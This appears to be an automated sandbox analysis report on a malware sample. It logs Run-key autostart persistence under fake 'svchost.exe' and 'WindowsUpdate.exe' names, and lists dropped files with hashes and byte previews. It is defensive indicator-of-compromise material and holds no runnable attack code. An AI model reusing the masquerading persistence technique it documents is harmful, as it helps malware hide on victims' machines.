                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, onedsblobprdcus15.centralus.cloudapp.azure.com, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, client.wns.windows.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, tile-service.weather.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    11:22:24API Interceptor926x Sleep call for process: svchost.exe modified
                                                                    11:22:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    11:22:27API Interceptor5x Sleep call for process: taskhost.exe modified
                                                                    11:22:35API Interceptor23x Sleep call for process: Windows Update.exe modified
                                                                    11:22:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                    11:22:39API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                    11:22:39API Interceptor4x Sleep call for process: dw20.exe modified
                                                                    11:22:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    11:22:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                    11:23:01AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4096
                                                                    Entropy (8bit):0.5975851327512959
                                                                    Encrypted:false
                                                                    SSDEEP:6:0FLk1GaD0JOCEfMuaaD0JOCEfMKQmD6tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0aGaD0JcaaD0JwQQ6tAg/0bjSQJ
                                                                    MD5:D87796F366C70FF245EE50AC6D986702
                                                                    SHA1:18EF75524480ACB54EDD94C6649B4A98EBC38AB9
                                                                    SHA-256:D96C38CD97B679DA05AC6BFE6CA5E971802C213407780EA4E190668A9960D3AA
                                                                    SHA-512:107D0C23110F90BADB501CCD644971AD99185BE223FBDBFEE76B103D9256740A5D9463E68996847B74267F6379DEBFCB752E8BA94AD3C174FEA888BBD881EFED
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ......:{..(.....!....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................!....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xebd9be4e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.09588615580835741
                                                                    Encrypted:false
                                                                    SSDEEP:12:X+sA0+NXO4blD2KlK5+sA0+NXO4blD2KlK:X+I3+I
                                                                    MD5:8D9FC6C34120DDC9EEA7B8B108D1E52E
                                                                    SHA1:62C0CDA550C8DBA877555389B59D43AB4F35EDEE
                                                                    SHA-256:D85849AD410CAF5DB73EE255A463C72BA4058EB3E96AB3FC20684176BE614C98
                                                                    SHA-512:0730F6677CDADEE365B524197E69961DD31B27521D3822F0B1B4D87C224D3C1DFA93AA800B3077C55A7543628628734E5E6DF46910C8C1E9262AAE9885C18616
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..N... ................e.f.3...w........................&..........w..!....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................X5."....y.a................Qm.a"....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.10820739268990756
                                                                    Encrypted:false
                                                                    SSDEEP:3:jZ/ll9EvHH5t7l/bJdAti/UTel/all:l/An5t7t4VmG
                                                                    MD5:5E6F02764C632E3A889D8DB681D43DFC
                                                                    SHA1:A739505085968FC5B82E0B4E66ED2A10DABF7B4A
                                                                    SHA-256:89304DD33D2A96013D8B95D81A323D61CA7CFEEF26C9132564B301C41B944F02
                                                                    SHA-512:24BFAA1AB9B0BC1EF44DC3317671B2A873533927DD31DE7435AC0F12B1A150383FF3435CDF57C092836B491BA27D21C716289E05851F38886519387670F60119
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: w5|......................................3...w.."....y.......w...............w.......w....:O.....w..................Qm.a"....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_vbc.exe_29b1fd91934ca85fd856bebf7e23b59544bb3f14_6c16ead4_19baeb35\Report.wer
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):7832
                                                                    Entropy (8bit):3.7697654129894604
                                                                    Encrypted:false
                                                                    SSDEEP:192:IgpBKDT5HBUZMXQf9jY/u7s7S274ItE7GDBv:I6YD9BUZMXojY/u7s7X4ItEOp
                                                                    MD5:94A7FB9849AACBCB38DA210BD4A9A0E5
                                                                    SHA1:50DA047C42570B6CABECDCE1291C32ACF39AD5C7
                                                                    SHA-256:75DC3BF23E7EFC0C872E26F403688A070C8FDA1465257DDC3BAA47F2FF3F56DF
                                                                    SHA-512:5F0D884E4B56C2C0295A53F32AE53054AA20212DB8614ACC7E0D9A61EC95A8B8F74B3A8A96ED1486AEEFD255C948D23CEB70154C18A1AD63F87DA8D381AAECA2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.1.8.6.4.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.8.0.9.2.6.7.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.c.4.e.c.f.7.-.a.a.f.7.-.4.8.6.7.-.9.2.4.8.-.f.5.b.8.3.3.4.1.3.5.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.8.8.6.4.d.1.-.b.4.7.9.-.4.8.2.b.-.9.4.0.b.-.b.f.b.b.4.d.9.e.1.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.9.4.-.0.0.0.1.-.0.0.1.7.-.0.0.4.c.-.9.9.2.7.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.8.7.d.9.a.6.e.c.3.f.2.6.2.e.8.b.7.1.d.1.9.a.c.1.5.7.c.2.a.2.8.6.a.0.f.5.9.d.d.!.v.b.c.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_vbc.exe_dbc95366787c6af920cbf43ce460525ddeedebbd_966227d3_198ee9cd\Report.wer
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):7830
                                                                    Entropy (8bit):3.7688031144285605
                                                                    Encrypted:false
                                                                    SSDEEP:192://XKUi28THBUZMXQf9jY/u7s7S274ItE7GDS:H6Ui2wBUZMXojY/u7s7X4ItEOS
                                                                    MD5:ABD2E2BFE051EC215B8B17037FE6FB2E
                                                                    SHA1:DCE114947B4707712A8C0BE4617F063DFA619984
                                                                    SHA-256:19BBEA37874789645FDA94F57A01209A8D93E4B594ED9889256BE5E7E8C7AC6D
                                                                    SHA-512:3D3A092B00D4C85037F37AB5D94D372BB5D5EB6AA0EC2B7FADD31A25FBABD0F99B9ED7D5A152E27CB4D45225E28FB9E6CD206070F4A8984651E123A782656D7E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.0.7.7.0.8.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.7.9.8.3.3.3.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.c.4.f.c.7.5.-.f.a.b.6.-.4.5.4.a.-.a.c.5.f.-.f.1.3.9.9.e.b.1.9.0.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.9.6.1.7.b.3.-.1.4.2.7.-.4.8.8.f.-.8.0.1.4.-.d.d.7.9.b.6.b.5.c.3.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.8.-.0.0.0.1.-.0.0.1.7.-.e.f.9.d.-.8.2.2.7.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.8.7.d.9.a.6.e.c.3.f.2.6.2.e.8.b.7.1.d.1.9.a.c.1.5.7.c.2.a.2.8.6.a.0.f.5.9.d.d.!.v.b.c.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_windows update.e_c1d66a88935183ae141aa58ee4c87ad14e6f9fe7_00000000_1a1eea0c\Report.wer
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):17916
                                                                    Entropy (8bit):3.7508704111475843
                                                                    Encrypted:false
                                                                    SSDEEP:192:i9TMCyXaKsn9fbeN9M2v1zzvSXk0ZKjBIcQrlu/u7s7S274It0:8TM/aEdvh/slu/u7s7X4It0
                                                                    MD5:CA90459EF7765BC961354186FB661F50
                                                                    SHA1:A0EBC223F958677A5A2CB3A35C1C9BA3302B0B92
                                                                    SHA-256:66E4F2577080DA4AC723F71E68B967CCC503C1C013F873A7B0C830FC4017DBA8
                                                                    SHA-512:B3E9D7782171052CE98EF178F3475BC54B2DCBAE79F1A6A3B7C0612100CF09E844A240DAABCDE894D1D469536809BD8123438AD566C0A49FC74C04F0EEDCAC8A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.6.7.8.9.7.1.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.5.7.8.5.2.2.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.7.c.3.e.7.d.-.c.2.7.1.-.4.6.e.e.-.a.b.e.7.-.f.9.7.2.6.9.f.9.0.4.9.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.4.-.0.0.0.1.-.0.0.1.7.-.9.4.1.7.-.3.e.2.5.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.c.2.2.0.b.8.c.0.1.0.a.8.d.3.0.b.9.9.7.3.7.8.f.6.6.e.3.c.7.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.1.9.a.b.2.f.0.6.2.a.e.b.9.8.5.d.b.1.f.1.1.d.4.4.e.e.6.c.0.1.7.7.f.7.e.5.9.a.9.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.8././.2.8.:.1.2.:.5.8.:.4.1.!.0.!.W.i.n.d.o.w.s. .U.p.d.a.t.e...e.x.e.....B.o.o.t.I.
                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_439f3432e91833156ec2cf888feef2fd243e3be_00000000_185f3e17\Report.wer
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):16728
                                                                    Entropy (8bit):3.753206684513917
                                                                    Encrypted:false
                                                                    SSDEEP:192:3D6ErrfiQVfaKsn9fbeN9M2v1zzvSXk0ZKjBIcQG0/u7s7S274ItQ:nPiAaEdvh/B0/u7s7X4ItQ
                                                                    MD5:DDA4C55E65434CADEE12AB3E4C51BFB4
                                                                    SHA1:9F9FEC6F59EC16901E2863C64C0B283D62CEFAB1
                                                                    SHA-256:E7D4783787113E857F93C39A03B5B55AEA60C0815E1FF119E6B003003FFAC1E4
                                                                    SHA-512:E91C124B52411EFA64FE2A0C193469E7A5BC52237735C166DDE391E8B0E5290EF142E7BA7CC3DA41D84F1103179A0E0FC05E94FF6788F96DB321BB0E7CAEB6DB
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.4.8.4.4.5.1.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.4.8.8.9.8.2.9.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.c.5.4.0.c.5.-.4.2.8.0.-.4.c.f.b.-.8.c.4.f.-.b.c.2.8.2.0.a.a.9.1.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.s.e.m.b.l.y.c.h.a.n.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.c.4.-.0.0.0.1.-.0.0.1.7.-.4.0.b.a.-.a.6.1.f.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.9.4.5.2.1.9.7.3.1.7.1.9.b.2.e.a.4.2.6.d.c.9.f.5.c.a.b.2.7.c.1.0.0.0.0.0.0.0.0.!.0.0.0.0.e.4.c.d.6.5.c.3.1.5.d.7.c.4.c.3.7.a.8.9.7.6.7.e.1.1.f.9.c.5.2.d.6.4.7.5.3.d.0.f.!.t.a.s.k.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.8././.2.8.:.1.3.:.0.0.:.4.9.!.0.!.t.a.s.k.h.o.s.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE49.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):7620
                                                                    Entropy (8bit):3.6899971075875073
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiRe6w6YNr6AAgmfZ2oSnCp13P1fh6pdm:RrlsNiY6w6Yx6AAgmfUoSu39f/
                                                                    MD5:66A963EF273036ED453A7DAC23882679
                                                                    SHA1:DEB544FDB13D26E54242520F8C9E03B5EC1BFC7F
                                                                    SHA-256:3B3A936A4EAD7B4FC4544467245F060F174457239F34BC51DC553FF73F47BC7B
                                                                    SHA-512:B925D897F8E8E33749830F386BC9318DBB0004991F7C58C15D6C19B48FFEA9E233455DBD097C8758AE53ACFCDDE76899DB253A02EB59ED618A90F1A9D336F24F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.4.8.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF44.tmp.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4683
                                                                    Entropy (8bit):4.445090832594526
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8B28fm8M4JFKQtWTFa+q8v1tWTdQeDN3RGd:uITfkJ1SNpJFKmKSdjN3RGd
                                                                    MD5:A7E90FB7735CE1D948082C45CB1DDDED
                                                                    SHA1:33D131051C620EEC1356417CAD38D0A549817D39
                                                                    SHA-256:55E61527AEAAEBD494849C23E550B8731C8B5A10AEDFF19827183466D75FD551
                                                                    SHA-512:B0ED19D17E7512AF006BF813C6FE0FFF12CE414B3E627EFDC243C9FBBB3C203615C846DB6C1752B084CB20BAF460C1121A70B7926159B52B940D6A9F21DB7030
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBF2.tmp.dmp
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Mon Sep 6 18:22:37 2021, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):17418
                                                                    Entropy (8bit):2.180452948610077
                                                                    Encrypted:false
                                                                    SSDEEP:96:58J8D/+0nlZKLfnQxWXBMc82dJ7icI/NJS1WIXYWIdI4zEVu9:jtnXrWXBd82v7BsNJLzEVu9
                                                                    MD5:A915F6C65D737F9D725BEFAA6D1611AF
                                                                    SHA1:7F01864E6EC6FAB3B17924769777B674B8D6482E
                                                                    SHA-256:A81A9E39A0FCDA95422AC9D34C45EF1D7EAC037C5C4E8678D9DCCD38372C771E
                                                                    SHA-512:4C73BF6A239C400E09D255DDF17E1F7F3C93E2A9FA6FE2920ECA60F3D7B2980AAD876230957DB90A4E05E817B694AB60235AEB9B01A61C1C23028A8C3B099312
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: MDMP....... .......m\6a...................U...........B......t.......GenuineIntelW...........T...........f\6a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC60.tmp.dmp
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Mon Sep 6 18:22:37 2021, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):17418
                                                                    Entropy (8bit):2.1919939055520095
                                                                    Encrypted:false
                                                                    SSDEEP:96:58uA8D/gDlZoLfnEtWXvJMMk2YR9pic7CCFYWInWIXmI4Xxcqua:nUXlWXB9k20XB7C8/Xxcqua
                                                                    MD5:3EF2F61C08E3469F3B17F6EDBBAD7203
                                                                    SHA1:EBA0AEACE9CABE4635BDE8C33656D0792382D0BC
                                                                    SHA-256:CB1C4EB01B42CF11CB74CEC598A8D5CDA6693EE5B0F6381307E963A9A7D2BA5D
                                                                    SHA-512:B12B7D83154D5AB647D02AC1EE711F8FEF8DCE3CD75ECABABBEC5DC4E6DFF78D43689ADFDC09EEC9252CA64C681F00E047D7B03EBF8A0CDC76F77ABCC32D1387
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: MDMP....... .......m\6a...................U...........B......t.......GenuineIntelW...........T...........f\6a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF7D.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5678
                                                                    Entropy (8bit):3.7237378697862953
                                                                    Encrypted:false
                                                                    SSDEEP:96:RtIU6o7r3GLt3iVWjW67QpYZIP9Sf1zgduBCaM1Bf1fIdLLm:Rrl7r3GLNiVWjW67eYZo9SnCp1Bf1fUi
                                                                    MD5:74161DE7FA537E233EEBAC3462A7D6C0
                                                                    SHA1:0CE559ABD6238C69D851A36A0F0709F39DD38809
                                                                    SHA-256:B81031E723CDB8F922FEB925A39BCBC2E0B2AECA08F92EBEC1FB5AACB016BEA9
                                                                    SHA-512:D02E4782CC7F20DF792D997931A5E04EBD9D243C2E82AC9A5AD68E24A2AEC5E17E724983956D9CC7C8FF9D106509302FA443314C2B86BCEC24993672D828BB15
                                                                    Malicious:false
                                                                    Reputation:unknown
